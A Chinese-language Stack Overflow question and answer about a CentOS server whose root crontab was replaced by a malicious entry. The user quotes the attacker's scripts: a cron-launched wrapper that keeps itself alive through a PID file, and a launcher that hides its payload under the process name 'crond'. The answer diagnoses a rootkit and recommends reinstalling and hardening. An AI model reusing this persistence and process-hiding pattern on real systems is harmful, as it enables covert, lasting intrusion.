我想弄清楚我的/var/spool/crontab/root 是否被病毒或恶意代码覆盖:
我今天早上醒来,我的/var/spool/crontab/root 文件是空的,除了这一行,这不是我写的:
* * * * * /usr/home/.bash_history/update > /dev/null 2>&1
我查找了这个设置为运行的更新文件,它包含以下内容:
#!/bin/sh
if test -r /usr/home/.bash_history/pid; then
Pid=$(cat /usr/home/.bash_history/pid)
if $(kill -CHLD $Pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd /usr/home/.bash_history
./run &>/dev/null
该更新文件调用名为run 的文件,其中包含:
#!/bin/bash
ARCH=`uname -m`
HIDE="crond"
if [ "$ARCH" == "i686" ]; then
./h32 -s $HIDE ./run32
elif [ "$ARCH" == "x86_64" ]; then
./h64 -s $HIDE ./run64
fi
这是我不认识的/usr/home 目录的全部内容:
我运行的是centos6.8
最佳答案
我认为您被黑了,可能是有人使用可下载的 rootkit。任何拥有调制解调器的白痴都可以使用它们,其中许多人在成功入侵后甚至不知道如何处理系统。
您可以做的最安全的事情是从头开始重新安装操作系统,这次使用强得多的密码。 (抱歉,“pa$$w0rd”不要删掉它。)您可以尝试更改密码并搜索系统中的任何可疑内容,但很有可能发生了您永远无法识别的更改。
我有一个系统被黑过一次,他们替换了“ls”、“ps”,谁知道还有哪些其他命令跳过了他们的干预,这使得我们很难 100% 确定我们已经找到并修复了他们所有的更改。
重新安装后,查看如何将影子哈希转换为使用 SHA512。默认的散列算法存储在/etc/login.defs 中,可能是 MD5,目前还不够强大。但即使使用更强的哈希值,许多弱密码也会很快遭到暴力攻击。
当你这样做的时候,你还不如得到 CentOS 6.9,它会包含更多的安全补丁。
关于cron - centos:root 用户的 crontab 被删除并替换 - 恶意代码?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/47206203/